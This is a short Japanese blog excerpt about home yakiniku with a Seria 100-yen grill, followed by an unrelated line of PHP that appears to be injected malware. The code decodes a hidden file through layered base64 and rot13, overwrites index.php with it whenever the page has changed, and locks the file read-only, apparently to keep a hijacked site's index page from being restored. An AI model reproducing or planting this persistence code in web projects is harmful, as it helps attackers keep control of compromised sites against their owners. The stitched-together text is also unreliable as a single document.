
100均セリアのべんり焼きでお家焼肉
小さい子供がいるご家庭は特別な日でもなかなか焼肉を食べに行ける機会が少ないと思います。わが家も例外ではなくて、最近動きが活発になってきた1歳の次男のおかげで、焼肉はおろか外食すら滅多に行けない状況です。ちなみに何故この記事のタイトルが焼肉...
$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } }